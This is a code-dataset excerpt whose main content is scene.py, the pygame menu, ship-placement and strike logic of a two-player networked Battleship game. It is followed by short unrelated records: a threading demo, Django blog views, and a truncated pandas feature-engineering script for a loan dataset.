Hitmarker\nfrom missmarker import Missmarker\n# Initialize fonts\ntitle_font = pygame.freetype.SysFont(\"monospace\", 70)\ntitle_font.pad = True\ntitle_font.strong = True\nfont = pygame.freetype.SysFont(\"Helvetica\", 50)\nfont.pad = True\nmono_font = pygame.freetype.SysFont(\"monospace\", 50)\nmono_font.pad = True\nstatus_font = pygame.freetype.SysFont(\"Helvetica\", 20)\n\nsettings = settings.Settings()\n# TODO: Should these be in constants or settings file???\n# Set the window settings\nSCREEN_WIDTH = 1000\nSCREEN_HEIGHT = 700\n\nclass SceneHandler():\n def __init__(self, start_scene, *args):\n self.scene = None\n # Set the scene to start scene\n self.switch(start_scene, *args)\n\n def switch(self, dest, *args):\n if dest == Scene.MAIN_MENU:\n self.scene = MainMenu(self, *args)\n elif dest == Scene.HOST_MENU:\n self.scene = HostMenu(self, *args)\n elif dest == Scene.WAIT_HOST_MENU:\n self.scene = WaitHostMenu(self, *args)\n elif dest == Scene.CONNECT_MENU:\n self.scene = ConnectMenu(self, *args)\n elif dest == Scene.WAIT_CONNECT_MENU:\n self.scene = WaitConnectMenu(self, *args)\n elif dest == Scene.PLACEMENT:\n self.scene = Placement(self, *args)\n elif dest == Scene.CLASH:\n self.scene = Clash(self, *args)\n elif dest == Scene.END:\n self.scene = End(self, *args)\n elif dest == Scene.CONNECTION_CLOSED:\n self.scene = ConnectionClosedMenu(self, *args)\n\nclass Scene():\n MAIN_MENU = 1\n HOST_MENU = 2\n WAIT_HOST_MENU = 3\n CONNECT_MENU = 4\n WAIT_CONNECT_MENU = 5\n PLACEMENT = 6\n CLASH = 7\n END = 8\n CONNECTION_CLOSED = 9\n\n def __init__(self):\n raise NotImplementedError\n\n def check_events(self):\n raise NotImplementedError\n\n def do_logic(self):\n raise NotImplementedError\n\n def draw(self):\n raise NotImplementedError\n\nclass MainMenu(Scene, menu.Menu):\n def __init__(self, scene_handler, screen):\n self.scene_handler = scene_handler\n # Get center of the screen\n center = screen.get_rect().center\n # Create labels\n self.title = menu.Label(\"MAIN\", title_font, color.BLACK, color.GREY)\n self.title.rect.center = center\n self.title.rect.y = 50\n # Create buttons\n self.host_btn = menu.Button(\"Host a server\", font)\n self.host_btn.rect.center = center\n self.host_btn.rect.y -= 75\n self.connect_btn = menu.Button(\"Connect to a server\", font)\n self.connect_btn.rect.center = center\n self.exit_btn = menu.Button(\"Exit\", font)\n self.exit_btn.rect.center = center\n self.exit_btn.rect.y += 100\n self.test_btn = menu.Button(\"TEST\", font)\n self.test_btn.rect.center = center\n self.test_btn.rect.y += 200\n buttons = [self.host_btn, self.connect_btn, self.exit_btn, self.test_btn]\n # Pass created components to the menu base class\n menu.Menu.__init__(self, screen, [self.title], buttons)\n\n def check_events(self):\n selected = self.check_menu_events()\n if selected == self.exit_btn or selected == -1:\n exit()\n elif selected == self.host_btn:\n self.scene_handler.switch(Scene.HOST_MENU, self.screen, \"localhost\", 7777)\n elif selected == self.connect_btn:\n self.scene_handler.switch(Scene.CONNECT_MENU, self.screen, \"localhost\", 7777)\n elif selected == self.test_btn:\n self.scene_handler.switch(Scene.PLACEMENT, self.screen, settings, None)\n\n def do_logic(self):\n pass\n \n def draw(self):\n self.screen.fill(color.GREY)\n self.draw_components()\n\nclass HostMenu(Scene, menu.Menu):\n def __init__(self, scene_handler, screen, ip=None, port=None):\n self.scene_handler = scene_handler\n if ip == None:\n self.ip = \"IP Address\"\n else:\n self.ip = ip\n if port == None:\n self.port = \"Port\"\n else:\n self.port = port\n center = screen.get_rect().center\n # Create labels\n self.title = menu.Label(\"HOST A SERVER\", title_font, color.BLACK, color.GREY)\n self.title.rect.center = center\n self.title.rect.y = 50\n # Create buttons for the menu\n self.settings_btn = menu.Button(\"Settings\", font, color.BLACK, color.GREY)\n self.settings_btn.rect.center = center\n self.start_btn = menu.Button(\"Start the server\", font, color.BLACK, color.GREY)\n self.start_btn.rect.center = center\n self.start_btn.rect.y += 75\n self.back_btn = menu.Button(\"Back\", font, color.BLACK, color.GREY)\n self.back_btn.rect.center = center\n self.back_btn.rect.y += 175\n # Create text boxes\n self.ip_box = menu.TextBox(self.ip, mono_font, 15, color.BLACK, color.WHITE, None)\n self.ip_box.rect.center = center\n self.ip_box.rect.y -= 150\n self.port_box = menu.TextBox(str(self.port), mono_font, 15, color.BLACK, color.WHITE, None)\n self.port_box.rect.center = center\n self.port_box.rect.y -= 75\n selectables = [self.ip_box, self.port_box, self.settings_btn, self.start_btn, self.back_btn]\n # Create the menu and draw it\n menu.Menu.__init__(self, screen, [self.title], selectables)\n\n def check_events(self):\n selected = self.check_menu_events()\n if selected == self.back_btn or selected == -1:\n self.scene_handler.switch(Scene.MAIN_MENU, self.screen)\n elif selected == self.settings_btn: # settings\n print(\"Settings menu.\")\n elif selected == self.start_btn: # start server\n ip = self.ip_box.get_text()\n port = int(self.port_box.get_text())\n self.scene_handler.switch(Scene.WAIT_HOST_MENU, self.screen, ip, port)\n \n def do_logic(self):\n pass\n\n def draw(self):\n self.draw_components()\n\nclass WaitHostMenu(Scene, menu.Menu):\n def __init__(self, scene_handler, screen, ip, port):\n self.scene_handler = scene_handler\n self.ip = ip\n self.port = port\n center = screen.get_rect().center\n self.title = menu.Label(\"Waiting for a client...\", font, color.BLACK, color.BLUE_GREY)\n self.title.rect.center = center\n self.title.rect.y = 150\n self.cancel_btn = menu.Button(\"Cancel\", font, color.BLACK, color.BLUE_GREY)\n self.cancel_btn.rect.center = center\n self.cancel_btn.rect.y = 400\n popup_offset_x = 100\n popup_offset_y = 100\n pop_rect = pygame.Rect(popup_offset_x, popup_offset_y, SCREEN_WIDTH - popup_offset_x * 2, SCREEN_HEIGHT - popup_offset_y * 2)\n menu.Menu.__init__(self, screen, [self.title], [self.cancel_btn], pop_rect, color.BLUE_GREY)\n # Create the connection\n self.connection = networking.server.Server()\n server_thread = self.connection.create(ip, port)\n server_thread.start()\n\n def check_events(self):\n selected = self.check_menu_events()\n if selected != None:\n # Stop the connection effort\n self.connection.close()\n self.scene_handler.switch(Scene.HOST_MENU, self.screen, self.ip, self.port)\n\n def do_logic(self):\n if self.connection.connected:\n self.scene_handler.switch(Scene.PLACEMENT, self.screen, settings, self.connection)\n \n def draw(self):\n self.draw_components()\n pass\n \nclass ConnectMenu(Scene, menu.Menu):\n def __init__(self, scene_handler, screen, ip=None, port=None):\n self.scene_handler = scene_handler\n if ip == None:\n self.ip = \"Ip Address\"\n else:\n self.ip = ip\n if port == None:\n self.port = \"Port\"\n else:\n self.port = port\n center = screen.get_rect().center\n # Create a title\n self.title = menu.Label(\"CONNECT\", title_font, color.BLACK, color.GREY)\n self.title.rect.center = center\n self.title.rect.y = 50\n # Create buttons for the menu\n self.connect_btn = menu.Button(\"Connect\", font, color.BLACK, color.GREY)\n self.connect_btn.rect.center = center\n self.back_btn = menu.Button(\"Back\", font, color.BLACK, color.GREY)\n self.back_btn.rect.center = center\n self.back_btn.rect.y += 100\n # Create text boxes\n self.ip_box = menu.TextBox(self.ip, mono_font, 15, color.BLACK, color.WHITE, None)\n self.ip_box.rect.center = center\n self.ip_box.rect.y -= 150\n self.port_box = menu.TextBox(str(self.port), mono_font, 15, color.BLACK, color.WHITE, None)\n self.port_box.rect.center = center\n self.port_box.rect.y -= 75\n selectables = [self.ip_box, self.port_box, self.connect_btn, self.back_btn]\n # Create the menu and draw it\n menu.Menu.__init__(self, screen, [self.title], selectables)\n\n def check_events(self):\n selected = self.check_menu_events()\n if selected == self.back_btn or selected == -1:\n self.scene_handler.switch(Scene.MAIN_MENU, self.screen)\n elif selected == self.connect_btn:\n ip = self.ip_box.get_text()\n port = int(self.port_box.get_text())\n self.scene_handler.switch(Scene.WAIT_CONNECT_MENU, self.screen, ip, port)\n #if wait_connect_menu(connection):\n # placement(settings, connection, square_group, reserved_squares)\n #else:\n # connection.interrupt_queue.put(True)\n\n def do_logic(self):\n pass\n\n def draw(self):\n self.screen.fill(color.GREY)\n self.draw_components()\n\nclass WaitConnectMenu(Scene, menu.Menu):\n def __init__(self, scene_handler, screen, ip, port):\n self.scene_handler = scene_handler\n self.settings = None\n self.ip = ip\n self.port = port\n center = screen.get_rect().center\n self.title = menu.Label(\"Awaiting response from server...\", font, color.BLACK, color.BLUE_GREY)\n self.title.rect.center = center\n self.title.rect.y = 150\n popup_offset_x = 100\n popup_offset_y = 100\n self.cancel_btn = menu.Button(\"Cancel\", font, color.BLACK, color.BLUE_GREY)\n self.cancel_btn.rect.center = center\n self.cancel_btn.rect.y = 400\n pop_rect = pygame.Rect(popup_offset_x, popup_offset_y, SCREEN_WIDTH - popup_offset_x * 2, SCREEN_HEIGHT - popup_offset_y * 2)\n menu.Menu.__init__(self, screen, [self.title], [self.cancel_btn], pop_rect, color.BLUE_GREY)\n # Create the connection\n self.connection = networking.client.Client()\n client_thread = self.connection.create(ip, port)\n client_thread.start()\n\n def do_logic(self):\n if self.connection.connected:\n self.scene_handler.switch(Scene.PLACEMENT, self.screen, settings, self.connection)\n \n if self.connection.check_closure() != None:\n print(\"Failed to connect!\")\n self.scene_handler.switch(Scene.CONNECT_MENU, self.screen, self.ip, self.port)\n\n def check_events(self):\n selected = self.check_menu_events()\n\n # Cancel button or escape is pressed\n if selected != None:\n # Stop the connection effort\n self.connection.close()\n self.scene_handler.switch(Scene.CONNECT_MENU, self.screen, self.ip, self.port)\n\n def draw(self):\n self.draw_components()\n\nclass Placement(Scene):\n def __init__(self, scene_handler, screen, settings, connection):\n self.scene_handler = scene_handler\n self.screen = screen\n self.connection = connection\n self.disconnect_menu = DisconnectMenu(screen)\n self.ready_msg_sent = False\n self.ready_msg_received = False\n # Create a game grid\n grid_offset_w = 50\n grid_offset_h = 50\n grid_width = SCREEN_WIDTH - 2 * grid_offset_w\n grid_height = SCREEN_HEIGHT - 2 * grid_offset_h\n self.grid = grid.Grid((grid_offset_w, grid_offset_h, grid_width, grid_height), settings.rows, settings.columns, 2, color.BLACK)\n # Create sprite groups \n self.square_group = self.grid.get_square_group(color.GREEN)\n self.reserved_squares = pygame.sprite.Group()\n self.colliding_squares = []\n # Create a sprite group for the ships\n self.unplaced_ships = pygame.sprite.LayeredUpdates()\n # Is normal sprite group enough?\n self.placed_ships = pygame.sprite.LayeredUpdates() \n self.square_size = self.grid.get_square_size_abs()\n # Normal sprite groups are not ordered, so this might return something else than the top left square\n self.start_square = self.grid.get_square((0,0))\n # Add every ship to the ships group\n grid_rect = self.grid.get_rect()\n for i in range(0, settings.carrier_count):\n carrier = ship.Ship(settings.carrier_size, self.square_size, grid_rect, self.square_group)\n carrier.move_to(self.start_square.rect.x, self.start_square.rect.y)\n self.unplaced_ships.add(carrier)\n for i in range(0, settings.battleship_count):\n battleship = ship.Ship(settings.battleship_size, self.square_size, grid_rect, self.square_group)\n battleship.move_to(self.start_square.rect.x, self.start_square.rect.y)\n self.unplaced_ships.add(battleship)\n for i in range(0, settings.cruiser_count):\n cruiser = ship.Ship(settings.cruiser_size, self.square_size, grid_rect, self.square_group)\n cruiser.move_to(self.start_square.rect.x, self.start_square.rect.y)\n self.unplaced_ships.add(cruiser)\n for i in range(0, settings.submarine_count):\n submarine = ship.Ship(settings.submarine_size, self.square_size, grid_rect, self.square_group)\n submarine.move_to(self.start_square.rect.x, self.start_square.rect.y)\n self.unplaced_ships.add(submarine)\n for i in range(0, settings.patrol_boat_count):\n patrol_boat = ship.Ship(settings.patrol_boat_size, self.square_size, grid_rect, self.square_group)\n patrol_boat.move_to(self.start_square.rect.x, self.start_square.rect.y)\n self.unplaced_ships.add(patrol_boat)\n\n self.awaiting_ship = self.unplaced_ships.get_sprite(0)\n self.collides = self.check_collision()\n self.ready = False\n\n def check_events(self):\n moved = False\n # Check events\n if self.disconnect_menu.visible:\n selection = self.disconnect_menu.check_menu_events()\n if selection == self.disconnect_menu.no_btn or selection == -1:\n self.disconnect_menu.visible = False\n elif selection == self.disconnect_menu.yes_btn:\n self.connection.close()\n self.scene_handler.switch(Scene.MAIN_MENU, self.screen)\n else:\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n self.disconnect_menu.visible = True\n if self.ready:\n # Return because all ships have been placed and we don't need to check movement keys anymore\n return\n elif event.key == pygame.K_d:\n print(f\"Ship coords:\", awaiting_ship.rect.x, awaiting_ship.rect.y)\n elif event.key == pygame.K_r:\n self.awaiting_ship.rotate(self.grid.get_rect())\n moved = True\n elif event.key == pygame.K_UP:\n self.awaiting_ship.move_up()\n moved = True\n elif event.key == pygame.K_DOWN:\n self.awaiting_ship.move_down()\n moved = True\n elif event.key == pygame.K_RIGHT:\n self.awaiting_ship.move_right()\n moved = True\n elif event.key == pygame.K_LEFT:\n self.awaiting_ship.move_left()\n moved = True\n # Collisions are checked again if the ship has been moved\n if moved:\n self.collides = self.check_collision()\n elif event.key == pygame.K_RETURN:\n self.try_place()\n \n def check_collision(self):\n self.colliding_squares = []\n collides = False\n # Find the ship's position and check if it's reserved\n for square in self.awaiting_ship.get_squares():\n current_colliding_squares = pygame.sprite.spritecollide(square, self.reserved_squares, False)\n if len(current_colliding_squares) > 0:\n self.colliding_squares.append(square)\n collides = True\n if collides:\n return True\n else:\n return False\n \n def do_logic(self):\n # Check if the connection was closed\n controlled_closure = self.connection.check_closure()\n if controlled_closure != None:\n if controlled_closure:\n msg = \"The connection was closed by the opponent.\"\n else:\n msg = \"The connection was closed unexpectedly.\"\n self.scene_handler.switch(Scene.CONNECTION_CLOSED, self.screen, msg)\n\n if self.ready_msg_sent == False and self.ready:\n packet = Packet([1], Packet.T_READY)\n self.connection.send_queue.put(packet)\n self.ready_msg_sent = True\n\n if self.ready_msg_received == False:\n ready_packet = self.connection.get_packet(Packet.T_READY)\n if ready_packet != None:\n self.ready_msg_received = True\n\n if self.ready_msg_sent and self.ready_msg_received:\n self.scene_handler.switch(Scene.CLASH, self.screen, settings, self.connection, self.placed_ships)\n \n def draw(self):\n # Draw (order is important)\n self.screen.fill(color.GREY)\n self.grid.draw(self.screen)\n# square_group.draw(screen)\n self.placed_ships.draw(self.screen)\n if not self.ready:\n self.awaiting_ship.draw(self.screen)\n pygame.draw.rect(self.screen, color.GREEN, self.awaiting_ship.rect, 2)\n # Draw a transparent surface on top of the colliding squares\n for s in self.colliding_squares:\n transparent_surf = pygame.Surface((s.rect.width, s.rect.height))\n transparent_surf.set_alpha(128)\n transparent_surf.fill(color.RED)\n self.screen.blit(transparent_surf, (s.rect.x, s.rect.y)) \n if self.disconnect_menu.visible:\n self.disconnect_menu.draw_components()\n # Status\n #screen.blit(status.surf, status.rect)\n\n def try_place(self):\n # If the position is not reserved, the ship is placed there\n if self.collides == False:\n # Add the ship to the group of placed ships\n self.placed_ships.add(self.awaiting_ship)\n # Reserve the squares\n self.reserved_squares.add(self.awaiting_ship.get_squares())\n # Remove the ship from awaiting ships\n self.unplaced_ships.remove(self.awaiting_ship)\n if len(self.unplaced_ships) > 0:\n self.awaiting_ship = self.unplaced_ships.get_sprite(0)\n self.collides = self.check_collision()\n else:\n # When all ships have been placed, set state to ready\n self.ready = True\n return True\n else:\n return False\n\nclass DisconnectMenu(Scene, menu.Menu):\n def __init__(self, screen):\n self.visible = False\n center = screen.get_rect().center\n self.title = menu.Label(\"Exit to main menu?\", font, color.BLACK, color.BLUE_GREY)\n self.title.rect.center = center\n self.title.rect.y = 250\n popup_offset_x = 200\n popup_offset_y = 200\n pop_rect = pygame.Rect(popup_offset_x, popup_offset_y, SCREEN_WIDTH - popup_offset_x * 2, SCREEN_HEIGHT - popup_offset_y * 2)\n self.yes_btn = menu.Button(\"Yes\", font, color.BLACK, color.BLUE_GREY)\n self.yes_btn.rect.center = pop_rect.center\n self.yes_btn.rect.y += 25\n self.no_btn = menu.Button(\"No\", font, color.BLACK, color.BLUE_GREY)\n self.no_btn.rect.center = pop_rect.center\n self.no_btn.rect.y += 100\n menu.Menu.__init__(self, screen, [self.title], [self.no_btn, self.yes_btn], pop_rect, color.BLUE_GREY)\n\nclass ConnectionClosedMenu(Scene, menu.Menu):\n def __init__(self, scene_handler, screen, message):\n self.scene_handler = scene_handler\n self.screen = screen\n center = screen.get_rect().center\n popup_offset_x = 200\n popup_offset_y = 200\n pop_rect = pygame.Rect(popup_offset_x, popup_offset_y, SCREEN_WIDTH - popup_offset_x * 2, SCREEN_HEIGHT - popup_offset_y * 2)\n title_rect = pygame.Rect(0, 0, pop_rect.w - 70, 62)\n self.title = menu.Label(message, font, color.BLACK, color.BLUE_GREY, title_rect)\n self.title.rect.center = center\n self.title.rect.y = 250\n self.ok_btn = menu.Button(\"OK\", font, color.BLACK, color.BLUE_GREY)\n self.ok_btn.rect.center = pop_rect.center\n self.ok_btn.rect.y += 25\n menu.Menu.__init__(self, screen, [self.title], [self.ok_btn], pop_rect, color.BLUE_GREY)\n\n def check_events(self):\n selection = self.check_menu_events()\n if selection == -1 or selection == self.ok_btn:\n self.scene_handler.switch(Scene.MAIN_MENU, self.screen)\n\n def do_logic(self):\n pass\n\n def draw(self):\n self.draw_components()\n\nclass Clash(Scene):\n def __init__(self, scene_handler, screen, settings, connection, placed_ships):\n self.scene_handler = scene_handler\n self.screen = screen\n self.settings = settings\n self.connection = connection\n self.disconnect_menu = DisconnectMenu(screen)\n # Create the grids\n offset_x = 50\n offset_y = 50\n width = (SCREEN_WIDTH - 3 * offset_x) / 2\n #height = SCREEN_HEIGHT - 2 * offset_y\n height = SCREEN_HEIGHT / 2\n self.my_grid = grid.Grid((offset_x, offset_y, width, height), settings.rows, settings.columns, 2, color.BLACK)\n enemy_offset_x = offset_x + width + offset_x\n self.enemy_grid = grid.Grid((enemy_offset_x, offset_y, width, height), settings.rows, settings.columns, 2, color.BLACK)\n self.square_size = self.my_grid.get_square_size_abs()\n self.my_squares = self.my_grid.get_square_group(color.GREEN)\n self.enemy_squares = self.enemy_grid.get_square_group(color.GREEN)\n start_square = self.enemy_squares.sprites()[0]\n # Create spritegroups for the ships and strikes\n self.my_ships = placed_ships\n self.my_strikes = pygame.sprite.Group()\n self.my_hits = pygame.sprite.Group()\n self.my_misses = pygame.sprite.Group()\n self.enemy_strikes = pygame.sprite.Group()\n self.enemy_hits = pygame.sprite.Group()\n self.enemy_misses = pygame.sprite.Group()\n # Create a crosshair\n self.crosshair = Crosshair(self.square_size, self.enemy_grid.get_rect(), self.enemy_squares)\n # Transform the placed ships to the new grid\n for ship in self.my_ships:\n ship.transform(self.square_size, self.my_squares)\n # Decide who goes first\n self.your_turn = False\n going_first = 0\n is_host = isinstance(self.connection, networking.server.Server)\n if is_host:\n going_first = random.randint(0, 1)\n if going_first == 0:\n self.your_turn = True\n else:\n go_first_packet = Packet([1], Packet.T_YOUR_TURN)\n self.connection.send_queue.put(go_first_packet)\n\n # Create status labels\n self.left_status = menu.Label(\"\", font, color.RED, color.GREY)\n self.left_status.rect.centerx = self.my_grid.get_rect().centerx\n self.left_status.rect.y = 420\n self.right_status = menu.Label(\"\", font, color.RED, color.GREY)\n self.right_status.rect.centerx = self.enemy_grid.get_rect().centerx\n self.right_status.rect.y = 420\n\n def check_events(self):\n if self.disconnect_menu.visible:\n selection = self.disconnect_menu.check_menu_events()\n if selection == self.disconnect_menu.no_btn or selection == -1:\n self.disconnect_menu.visible = False\n elif selection == self.disconnect_menu.yes_btn:\n self.connection.close()\n self.scene_handler.switch(Scene.MAIN_MENU, self.screen)\n else:\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n self.disconnect_menu.visible = True\n if self.your_turn:\n if event.key == pygame.K_UP:\n self.crosshair.move_up()\n elif event.key == pygame.K_DOWN:\n self.crosshair.move_down()\n elif event.key == pygame.K_RIGHT:\n self.crosshair.move_right()\n elif event.key == pygame.K_LEFT:\n self.crosshair.move_left()\n elif event.key == pygame.K_RETURN:\n if self.try_strike():\n target_square = self.crosshair.get_squares().sprites()[0]\n self.my_strikes.add(target_square)\n strike_pos = target_square.pos\n # Send the strike coordinates to opponent\n strike_packet = Packet(strike_pos, Packet.T_STRIKE)\n self.connection.send_queue.put(strike_packet)\n self.your_turn = False\n\n def try_strike(self):\n \"\"\"\n Try to strike a square on the grid.\n\n :return: True if the strike was done, False if the position had already been struck\n :rtype: bool\n \"\"\"\n target_square = self.crosshair.get_squares().sprites()[0]\n already_struck = False\n for square in self.my_strikes:\n if square == target_square:\n already_struck = True\n break\n\n if already_struck:\n return False\n else:\n return True\n\n def get_square_in_coordinates(self, square_group, position):\n position = tuple(position)\n for square in square_group:\n if square.pos == position:\n return square\n\n def evaluate_enemy_strike(self, strike_pos):\n \"\"\"\n Check whether the enemy strike hit any of our ships.\n\n :param tuple strike_pos: the position where the enemy strike hit in grid coordinates (x, y)\n :return: 1 if the strike hit our ship, 0 if the strike missed\n :rtype: int\n \"\"\"\n hit = False\n target_square = self.get_square_in_coordinates(self.my_squares, strike_pos)\n for ship in self.my_ships:\n for square in ship.get_squares():\n if square.pos == strike_pos:\n hit = True\n \n if hit:\n hitmarker = Hitmarker(self.square_size, self.my_grid.get_rect(), self.my_squares)\n hitmarker.move_to(target_square.rect.x, target_square.rect.y)\n self.enemy_hits.add(hitmarker)\n self.left_status.text = \"A hit!\"\n return 1\n else:\n missmarker = Missmarker(self.square_size, self.my_grid.get_rect(), self.my_squares)\n missmarker.move_to(target_square.rect.x, target_square.rect.y)\n self.enemy_misses.add(missmarker)\n self.left_status.text = \"A miss!\"\n return 0\n\n def check_strike_result(self, data):\n \"\"\"\n Check the result of our own strike given by the opponent. \n Add a hitmarker or missmarker on the enemy grid depending on the result.\n\n :param list data: data of the result packet\n \"\"\"\n result = data[0]\n strike_pos = [data[1], data[2]]\n target_square = self.get_square_in_coordinates(self.enemy_squares, strike_pos)\n if result == 1:\n hitmarker = Hitmarker(self.square_size, self.enemy_grid.get_rect(), self.enemy_squares)\n hitmarker.move_to(target_square.rect.x, target_square.rect.y)\n self.my_hits.add(hitmarker)\n self.right_status.text = \"A hit!\"\n else:\n missmarker = Missmarker(self.square_size, self.enemy_grid.get_rect(), self.enemy_squares)\n missmarker.move_to(target_square.rect.x, target_square.rect.y)\n self.my_misses.add(missmarker)\n self.right_status.text = \"A miss!\"\n\n def do_logic(self):\n # Check if the connection was closed\n controlled_closure = self.connection.check_closure()\n if controlled_closure != None:\n if controlled_closure:\n msg = \"The connection was closed by the opponent.\"\n else:\n msg = \"The connection was closed unexpectedly.\"\n self.scene_handler.switch(Scene.CONNECTION_CLOSED, self.screen, msg)\n \n turn_packet = self.connection.get_packet(Packet.T_YOUR_TURN)\n if turn_packet != None:\n self.your_turn = True\n\n # Enemy strike\n enemy_strike_packet = self.connection.get_packet(Packet.T_STRIKE)\n if enemy_strike_packet != None:\n strike_pos = enemy_strike_packet.get_data(include_header=False)\n result = self.evaluate_enemy_strike(tuple(strike_pos))\n data = [result, strike_pos[0], strike_pos[1]]\n enemy_result_packet = Packet(data, Packet.T_STRIKE_RESULT)\n self.connection.send_queue.put(enemy_result_packet)\n # Check if our fleet has been destroyed\n if len(self.enemy_hits) == self.settings.total_reserved_squares:\n # Send game over message\n game_over = Packet([1], Packet.T_GAME_OVER)\n self.connection.send_queue.put(game_over)\n # Hide the disconnect menu if it's open\n self.disconnect_menu.visible = False\n self.draw()\n self.scene_handler.switch(Scene.END, self.screen, self.settings, self.connection)\n else:\n self.your_turn = True\n\n # Result of own strike\n result_packet = self.connection.get_packet(Packet.T_STRIKE_RESULT)\n if result_packet != None:\n data = result_packet.get_data(include_header=False)\n self.check_strike_result(data)\n\n game_over_packet = self.connection.get_packet(Packet.T_GAME_OVER)\n if game_over_packet != None:\n self.draw()\n print(\"Victory!\")\n self.scene_handler.switch(Scene.END, self.screen, self.settings, self.connection)\n\n def draw(self):\n self.screen.fill(color.GREY)\n self.my_grid.draw(self.screen)\n self.enemy_grid.draw(self.screen)\n #self.enemy_squares.draw(self.screen)\n self.my_ships.draw(self.screen)\n if len(self.enemy_strikes) > 0:\n self.enemy_strikes.draw(self.screen)\n if self.your_turn:\n self.crosshair.draw(self.screen)\n for s in self.my_ships:\n pygame.draw.rect(self.screen, color.RED, s.rect, 1)\n self.my_hits.draw(self.screen)\n self.my_misses.draw(self.screen)\n self.enemy_hits.draw(self.screen)\n self.enemy_misses.draw(self.screen)\n self.left_status.draw(self.screen)\n self.right_status.draw(self.screen)\n if self.disconnect_menu.visible:\n self.disconnect_menu.draw_components()\n\nclass End(Scene):\n class EndMenu(menu.Menu):\n def __init__(self, screen):\n popup_offset_x = 500\n popup_offset_y = 450\n pop_rect = pygame.Rect(popup_offset_x, popup_offset_y, 300, 200)\n center = pop_rect.center\n self.play_again_btn = menu.Button(\"Play again\", font)\n self.play_again_btn.rect.center = center\n self.play_again_btn.rect.y -= 50\n self.exit_btn = menu.Button(\"Exit to menu\", font)\n self.exit_btn.rect.center = center\n self.exit_btn.rect.y += 50\n menu.Menu.__init__(self, screen, [], [self.play_again_btn, self.exit_btn], pop_rect, color.BLUE_GREY)\n\n def __init__(self, scene_handler, screen, settings, connection):\n self.scene_handler = scene_handler\n self.screen = screen\n self.settings = settings\n self.connection = connection\n self.menu = self.EndMenu(screen)\n\n def check_events(self):\n selection = self.menu.check_menu_events()\n if selection == -1:\n exit()\n\n if selection == self.menu.exit_btn:\n self.connection.close()\n self.scene_handler.switch(Scene.MAIN_MENU, self.screen)\n \n def do_logic(self):\n controlled_closure = self.connection.check_closure()\n if controlled_closure != None:\n if controlled_closure:\n msg = \"The connection was closed by the opponent.\"\n else:\n msg = \"The connection was closed unexpectedly.\"\n print(msg)\n\n def draw(self):\n self.menu.draw_components()\n pass\n","sub_path":"scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":33967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"285629199","text":"import time\nimport threading\n\ndef draw_circle(cost):\n\tprint(\"start draw a circle \", time.ctime())\n\ttime.sleep(cost)\n\tprint(\"draw a circle \", time.ctime())\n\ndef draw_square(cost):\n\tprint(\"start draw a square \", time.ctime())\n\ttime.sleep(cost)\n\tprint(\"draw a square \", time.ctime())\n\ndef multi_thread():\n\tdraw_circle_thread = threading.Thread(target=draw_circle, args=(1,))\n\tdraw_square_thread = threading.Thread(target=draw_square, args=(2,))\n\tdraw_circle_thread.start()\n\tdraw_square_thread.start()\n\tdraw_circle_thread.join()\n\tdraw_square_thread.join()\n\nif __name__ == '__main__':\n\tprint(\"start \", time.ctime())\n\tmulti_thread()\n\tprint(\"end \", time.ctime())\n","sub_path":"2020/06/01/python/python线程/multi_thread.py","file_name":"multi_thread.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"207104666","text":"# dojo/view.py\nfrom django.contrib import messages\nfrom django.http import Http404\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom .models import Post\nfrom .forms import PostForm\nfrom .models import Comment\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\ndef post_list(request):\n qs = Post.objects.all().prefetch_related('tag_set','comment_set') \n \n q = request.GET.get('q','')\n if q:\n qs = qs.filter(title__icontains = q)\n \n return render(request, 'blog/post_list.html',{'post_list': qs, 'q':q })\n\ndef post_detail(request, id):\n #try:\n # post = Post.objects.get(id=id)\n #except Post.DoesNotExist:\n # raise Http404\n post = get_object_or_404(Post,id=id) #위에 4가지 코드를 1줄로!\n return render(request, 'blog/post_detail.html', {'post': post})\n\ndef post_new(request):\n if request.method =='POST':\n form = PostForm(request.POST, request.FILES)\n if form.is_valid():\n post = form.save() \n messages.success(request, '새 포스팅을 저장했습니다.')\n return redirect(post) # 이미 model 에 post.get_absolute_url 함수를 구현 -->post_detail 로 이동\n \n else:\n form = PostForm\n return render(request, 'blog/post_form.html', {'form': form})\n\ndef post_edit(request, id):\n post = get_object_or_404(Post, id=id)\n if request.method =='POST':\n form = PostForm(request.POST, request.FILES, instance=post)\n if form.is_valid():\n post = form.save()\n messages.success(request, '포스팅을 수했습니다.') \n return redirect(post) # 이미 model 에 post.get_absolute_url 함수를 구현 -->post_detail 로 이동\n \n else:\n form = PostForm(instance=post)\n return render(request, 'blog/post_form.html', {'form': form})\n\ndef comment_list(request):\n comment_list = Comment.objects.all().select_related('post')\n \n return render(request, 'blog/comment_list.html', {\n 'comment_list' : comment_list,\n})","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"106916593","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 20 18:09:53 2018\n\n@author: Hubert\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport xgboost as xgb\n\nfrom sklearn import model_selection\nfrom sklearn.ensemble import VotingClassifier\n\nimport datetime\n\ndef addCities(df):\n cityCode = [\"C10001\", \"C10002\", \"C10003\", \"C10006\",\"C10004\", \n \"C10005\", \"C10007\", \"C10010\", \"C10008\", \"C10009\"]\n \n for city in cityCode:\n df[city] = (df['City_Code']== city)\n return df\n\ndef addSource(df):\n sourceCode = [\"S122\", \"S133\", \"S143\", \"S134\", \"S159\"]\n \n for source in sourceCode:\n df[source] = (df[\"Source\"]== source)\n return df\n\ndef addBank(df):\n bankCode = [\"B001\", \"B002\", \"B003\", \"B004\", \"B005\", \"B006\", \"B011\"]\n \n for bank in bankCode:\n df[bank] = (df[\"Customer_Existing_Primary_Bank_Code\"]== bank)\n return df\n\ndef addMoneyFeature(df):\n df[\"monthlyIncomeRatio\"] = df[\"Monthly_Income\"]/df[\"Loan_Amount\"] \n \n return df\n\ndef addEMIFeature(df):\n 